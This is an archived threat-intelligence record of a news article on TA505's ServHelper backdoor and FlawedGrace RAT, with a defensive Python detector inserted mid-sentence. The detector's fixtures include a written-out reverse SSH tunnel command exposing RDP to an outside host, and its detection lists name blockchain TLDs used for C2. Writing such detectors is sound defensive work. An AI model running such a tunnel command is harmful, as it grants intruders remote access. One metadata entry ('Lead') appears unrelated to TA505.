{
	"id": "74b14470-fa98-481c-8852-30cdfe76e323",
	"created_at": "2026-04-06T00:12:29.161206Z",
	"updated_at": "2026-04-10T03:36:36.991643Z",
	"deleted_at": null,
	"sha1_hash": "908280f8d536a25a47cabb69f3f6f5dce653b164",
	"title": "TA505 Group Adopts New ServHelper Backdoor and FlawedGrace RAT",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2242524,
	"plain_text": "TA505 Group Adopts New ServHelper Backdoor and FlawedGrace RAT\r\nBy Ionut Ilascu\r\nPublished: 2019-01-10 · Archived: 2026-04-05 13:51:55 UTC\r\nMalware researchers discovered two new malware families distributed last year through phishing campaigns carried out by\r\nthe TA505 cybercriminal group: the ServHelper backdoor, seen in two variants, and the FlawedGrace remote access trojan (RAT).\r\nThe threat actor continues to target organizations in the financial and retail sectors, the researchers say, using Microsoft\r\nWord, Microsoft Publisher, and PDF files to pull the malware onto the victim's computer.\r\nTA505, the name given by Proofpoint, has been in the cybercrime business for at least four years. This is the group behind\r\nthe infamous Dridex banking trojan and Locky ransomware, delivered through malicious email campaigns\r\nvia the Necurs botnet.\r\nhttps://www.bleepingcomputer.com/news/security/ta505-group-adopts-new-servhelper-backdoor-and-flawedgrace-rat/\r\nPage 1 of 6\r\nOther malware associated with TA505 includes the Philadelphia and GlobeImposter ransomware families.\r\nServHelper delivered in three campaigns\r\nA first salvo of malicious messages was sent on November 9, 2018. It was a small campaign of several thousand emails\r\ndelivering Word and Publisher documents laced with hostile macros.\r\nA larger campaign with tens of thousands of emails occurred six days later and carried messages with .DOC, .PUB, and\r\n.WIZ documents, all specific to the Microsoft Office components mentioned above.\r\nIn a third session, observed on December 13, the threat actor mixed in PDF files with URLs purporting to lead to an Adobe\r\nupdate. Following the link took the potential victim to a fake \"Adobe PDF Plugin\" webpage that led to ServHelper.\r\nProofpoint, which spotted these campaigns and analyzed the two malware families, says that the distribution is not focused on\r\na particular region of the world; the focus is instead on financial services organizations.\r\nThe infrastructure used for running these campaigns remains unknown for the time being, but it does not present the\r\nhallmarks specific to the Necurs botnet.\r\nActively developed, ServHelper comes in two flavors\r\nThe purpose of the macro was to download and execute a variant of ServHelper that sets up reverse SSH tunnels, giving the\r\nattacker access to the infected host over the Remote Desktop Protocol (RDP), port 3389. Because a reverse tunnel is opened\r\noutbound from the victim, inbound firewall rules never see a connection to 3389; the RDP session rides inside the SSH session\r\nthe malware itself initiated.\r\n\"Once ServHelper establishes remote desktop access, the malware contains functionality for the threat actor to “hijack”\r\nlegitimate user accounts or their web browser profiles and use them as they see fit,\" researchers from Proofpoint explain in\r\nan analysis released today.\r\nThe other ServHelper variant does not include the tunneling and hijacking capabilities and functions only as a downloader\r\nfor the FlawedGrace RAT.\r\nServHelper is written in Delphi and its developers continue to update it with new features and commands. 
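The two ServHelper behaviours that matter most to a defender, the reverse SSH tunnel described above and the .bit-based name resolution covered in the next section, can each be checked from ordinary telemetry. The Python below is an added example written for this page, not Proofpoint's analysis code or anything taken from the malware; the command lines, DNS events, resolver addresses and the approved-resolver list are constructed assumptions, and the -R parsing follows OpenSSH's documented [bind_address:]port:host:hostport syntax. It flags an ssh or plink process publishing local port 3389 on a remote host, and DNS lookups for blockchain TLDs or to resolvers outside the sanctioned set, which is what \"layered security to block related traffic\" comes down to in practice.

```python
"""Layered checks for the ServHelper tradecraft in the article: a reverse
SSH tunnel exposing the local RDP port (3389), and C2 name resolution
through blockchain TLDs such as .bit. Added example; not Proofpoint's or
the malware's code. Every event below is constructed for illustration."""
import shlex
from dataclasses import dataclass
from typing import List, Optional, Tuple

RDP_PORT = 3389
SSH_CLIENTS = {"ssh", "ssh.exe", "plink", "plink.exe"}
# TLDs served from a blockchain rather than the ICANN root (from the article).
BLOCKCHAIN_TLDS = {"bit", "emc", "lib", "bazar", "coin"}
# Resolvers the (hypothetical) enterprise allows; anything else is a bypass.
APPROVED_RESOLVERS = {"10.0.0.53"}


@dataclass
class Finding:
    layer: str   # "host" or "network"
    detail: str


def reverse_forwards(cmdline: str) -> List[Tuple[str, int]]:
    """Return (spec, local_port) for each -R remote forward in an ssh/plink
    command line. OpenSSH syntax: -R [bind_address:]port:host:hostport."""
    try:
        argv = shlex.split(cmdline, posix=False)  # keeps Windows backslashes
    except ValueError:
        argv = cmdline.split()
    if not argv:
        return []
    exe = argv[0].strip('"').replace("/", "\\").rsplit("\\", 1)[-1].lower()
    if exe not in SSH_CLIENTS:
        return []
    forwards = []
    i = 1
    while i < len(argv):
        spec: Optional[str] = None
        if argv[i] == "-R" and i + 1 < len(argv):
            spec, i = argv[i + 1], i + 1
        elif argv[i].startswith("-R") and len(argv[i]) > 2:
            spec = argv[i][2:]
        if spec:
            parts = spec.rsplit(":", 2)  # ..., host, hostport
            if len(parts) == 3 and parts[2].isdigit():
                forwards.append((spec, int(parts[2])))
        i += 1
    return forwards


def check_process(cmdline: str) -> List[Finding]:
    """Host layer: an SSH client publishing the local RDP port on a remote host."""
    return [Finding("host", f"reverse SSH tunnel exposes RDP via -R {spec}")
            for spec, port in reverse_forwards(cmdline) if port == RDP_PORT]


def check_dns(qname: str, resolver: str) -> List[Finding]:
    """Network layer: .bit-style lookups, and DNS sent to an unsanctioned
    resolver (the ICANN root knows nothing about these TLDs, so the host must
    talk to a resolver that bridges to the blockchain)."""
    findings = []
    tld = qname.rstrip(".").rsplit(".", 1)[-1].lower()
    if tld in BLOCKCHAIN_TLDS:
        findings.append(Finding("network", f"blockchain-TLD lookup: {qname}"))
    if resolver not in APPROVED_RESOLVERS:
        findings.append(Finding("network", f"DNS to unsanctioned resolver {resolver}"))
    return findings


# Constructed telemetry (documentation-range IPs; not real campaign data).
SAMPLE_EVENTS = [
    {"type": "process", "cmdline":
     r'C:\Users\Public\ssh.exe -N -R 0.0.0.0:11110:127.0.0.1:3389 -p 443 u@203.0.113.7'},
    {"type": "process", "cmdline":
     r'"C:\Windows\System32\OpenSSH\ssh.exe" -R 8080:localhost:80 dev@10.1.2.3'},
    {"type": "dns", "resolver": "203.0.113.9", "qname": "dedsolutions.bit"},
    {"type": "dns", "resolver": "10.0.0.53", "qname": "www.example.com"},
    {"type": "dns", "resolver": "10.0.0.53", "qname": "update.arepos.bit"},
]


def triage(events) -> List[Finding]:
    """Run both layers over a stream of events and collect the findings."""
    findings: List[Finding] = []
    for ev in events:
        if ev["type"] == "process":
            findings.extend(check_process(ev["cmdline"]))
        elif ev["type"] == "dns":
            findings.extend(check_dns(ev["qname"], ev["resolver"]))
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"[{f.layer}] {f.detail}")
```

Run stand-alone it prints one line per finding. The legitimate OpenSSH forward of port 80 is deliberately left unflagged so the host check stays specific to RDP; the resolver check is what catches .bit traffic in practice, because a lookup sent to a sanctioned corporate resolver simply fails, while a host that can actually resolve dedsolutions[.]bit must be talking to a resolver the enterprise never approved.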
Proofpoint says\r\nthat almost every new campaign reveals a changed variant of the malware.\r\nUse of decentralized DNS\r\nTo protect the command and control (C2) servers against takedown efforts, the developer(s) use the .bit Top-Level Domain\r\n(TLD) for the Domain Name System (DNS) servers.\r\nResearchers found two such DNS servers, dedsolutions[.]bit and arepos[.]bit, resolving the IP addresses for four of\r\nServHelper's C2 servers.\r\nGeneric TLDs like .com and .org, and the Country Code TLDs (ccTLDs) designated for particular countries, are run by\r\nregistries and registrars that operate under the coordination of the Internet Corporation for Assigned Names and Numbers (ICANN).\r\nSecurity researchers and law enforcement agencies can therefore work through the registry or registrar, and ICANN's processes, to\r\nshut down, seize or sinkhole a domain name.\r\nThe .bit TLD does not fall under the umbrella of ICANN and is instead served from the Namecoin cryptocurrency's\r\nblockchain, where name records are stored as transactions.\r\nThe name data is replicated over a peer-to-peer network, making it fully decentralized and immune to any government or\r\norganization's efforts to regulate, suspend, or sinkhole it. Other decentralized TLDs are .emc, .lib, .bazar and .coin.\r\nThe flip side for defenders is that ordinary recursive resolvers know nothing about these TLDs, so an infected host can only\r\nresolve such names through a resolver that bridges to the blockchain, which is itself a network signal worth watching.\r\nProofpoint told BleepingComputer that not all C2 infrastructure uses .bit domains, and those parts can be taken down. \"In other cases,\r\nparticularly those using crypto dns, defenders need to rely on layered security to block related traffic,\" they added.\r\nFlawedGrace is a tough nut to crack\r\nThis is not Proofpoint's first encounter with the FlawedGrace RAT: the malware has been on the researchers' radar since early\r\nNovember 2017.\r\nAlthough multiple variants exist, some as early as August 2017, it was not seen actively distributed until recently.\r\n\"Per the malware’s debug strings, significant development took place during the end of 2017. 
The ServHelper campaigns\r\nwere distributing version 2.0.10 of the malware [built on November 20, 2017],\" the researchers note in their report.\r\nThey also point out that FlawedGrace is a full-featured RAT written in C++ and that it is a very large program that makes\r\n\"extensive use of object-oriented and multithreaded programming techniques.\" As a consequence, getting familiar with its\r\ninternal structure takes a lot of time and is far from a simple task.\r\nAfter analyzing both malware families, the researchers concluded that there are sufficient discrepancies in\r\ncoding style and techniques for them to be the work of different developers.\r\nUpdate [01.10.2019]: The article erroneously stated that the Necurs botnet was used to run the email campaigns that\r\ndelivered the ServHelper and FlawedGrace malware. We have updated it to reflect that the TA505 group is behind the\r\nnew malware families. We also included comments from Proofpoint.\r\nSource: https://www.bleepingcomputer.com/news/security/ta505-group-adopts-new-servhelper-backdoor-and-flawedgrace-rat/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"MISPGALAXY"
	],
	"references": [
		"https://www.bleepingcomputer.com/news/security/ta505-group-adopts-new-servhelper-backdoor-and-flawedgrace-rat/"
	],
	"report_names": [
		"ta505-group-adopts-new-servhelper-backdoor-and-flawedgrace-rat"
	],
	"threat_actors": [
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "5e6b31a6-80e3-4e7d-8b0a-d94897ce9b59",
			"created_at": "2024-06-19T02:03:08.128175Z",
			"updated_at": "2026-04-10T02:00:03.636663Z",
			"deleted_at": null,
			"main_name": "GOLD TAHOE",
			"aliases": [
				"Cl0P Group Identity",
				"FIN11 ",
				"GRACEFUL SPIDER ",
				"SectorJ04 ",
				"Spandex Tempest ",
				"TA505 "
			],
			"source_name": "Secureworks:GOLD TAHOE",
			"tools": [
				"Clop",
				"Cobalt Strike",
				"FlawedAmmy",
				"Get2",
				"GraceWire",
				"Malichus",
				"SDBbot",
				"ServHelper",
				"TrueBot"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "75d4d6a9-b5d1-4087-a7a0-e4a9587c45f4",
			"created_at": "2022-10-25T15:50:23.5188Z",
			"updated_at": "2026-04-10T02:00:05.26565Z",
			"deleted_at": null,
			"main_name": "TA505",
			"aliases": [
				"TA505",
				"Hive0065",
				"Spandex Tempest",
				"CHIMBORAZO"
			],
			"source_name": "MITRE:TA505",
			"tools": [
				"AdFind",
				"Azorult",
				"FlawedAmmyy",
				"Mimikatz",
				"Dridex",
				"TrickBot",
				"Get2",
				"FlawedGrace",
				"Cobalt Strike",
				"ServHelper",
				"Amadey",
				"SDBbot",
				"PowerSploit"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "99cb4e5b-8071-4f9e-aa1d-45bfbb6197e3",
			"created_at": "2023-01-06T13:46:38.860754Z",
			"updated_at": "2026-04-10T02:00:03.125179Z",
			"deleted_at": null,
			"main_name": "TA505",
			"aliases": [
				"SectorJ04",
				"SectorJ04 Group",
				"ATK103",
				"GRACEFUL SPIDER",
				"GOLD TAHOE",
				"Dudear",
				"G0092",
				"Hive0065",
				"CHIMBORAZO",
				"Spandex Tempest"
			],
			"source_name": "MISPGALAXY:TA505",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e447d393-c259-46e2-9932-19be2ba67149",
			"created_at": "2022-10-25T16:07:24.28282Z",
			"updated_at": "2026-04-10T02:00:04.921616Z",
			"deleted_at": null,
			"main_name": "TA505",
			"aliases": [
				"ATK 103",
				"Chimborazo",
				"G0092",
				"Gold Evergreen",
				"Gold Tahoe",
				"Graceful Spider",
				"Hive0065",
				"Operation Tovar",
				"Operation Trident Breach",
				"SectorJ04",
				"Spandex Tempest",
				"TA505",
				"TEMP.Warlock"
			],
			"source_name": "ETDA:TA505",
			"tools": [
				"Amadey",
				"AmmyyRAT",
				"AndroMut",
				"Azer",
				"Bart",
				"Bugat v5",
				"CryptFile2",
				"CryptoLocker",
				"CryptoMix",
				"CryptoShield",
				"Dridex",
				"Dudear",
				"EmailStealer",
				"FRIENDSPEAK",
				"Fake Globe",
				"Fareit",
				"FlawedAmmyy",
				"FlawedGrace",
				"FlowerPippi",
				"GOZ",
				"GameOver Zeus",
				"GazGolder",
				"Gelup",
				"Get2",
				"GetandGo",
				"GlobeImposter",
				"Gorhax",
				"GraceWire",
				"Gussdoor",
				"Jaff",
				"Kasidet",
				"Kegotip",
				"Kneber",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"Locky",
				"MINEBRIDGE",
				"MINEBRIDGE RAT",
				"MirrorBlast",
				"Neutrino Bot",
				"Neutrino Exploit Kit",
				"P2P Zeus",
				"Peer-to-Peer Zeus",
				"Philadelphia",
				"Philadephia Ransom",
				"Pony Loader",
				"Rakhni",
				"ReflectiveGnome",
				"Remote Manipulator System",
				"RockLoader",
				"RuRAT",
				"SDBbot",
				"ServHelper",
				"Shifu",
				"Siplog",
				"TeslaGun",
				"TiniMet",
				"TinyMet",
				"Trojan.Zbot",
				"Wsnpoem",
				"Zbot",
				"Zeta",
				"ZeuS",
				"Zeus"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434349,
	"ts_updated_at": 1775792196,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/908280f8d536a25a47cabb69f3f6f5dce653b164.pdf",
		"text": "https://archive.orkl.eu/908280f8d536a25a47cabb69f3f6f5dce653b164.txt",
		"img": "https://archive.orkl.eu/908280f8d536a25a47cabb69f3f6f5dce653b164.jpg"
	}
}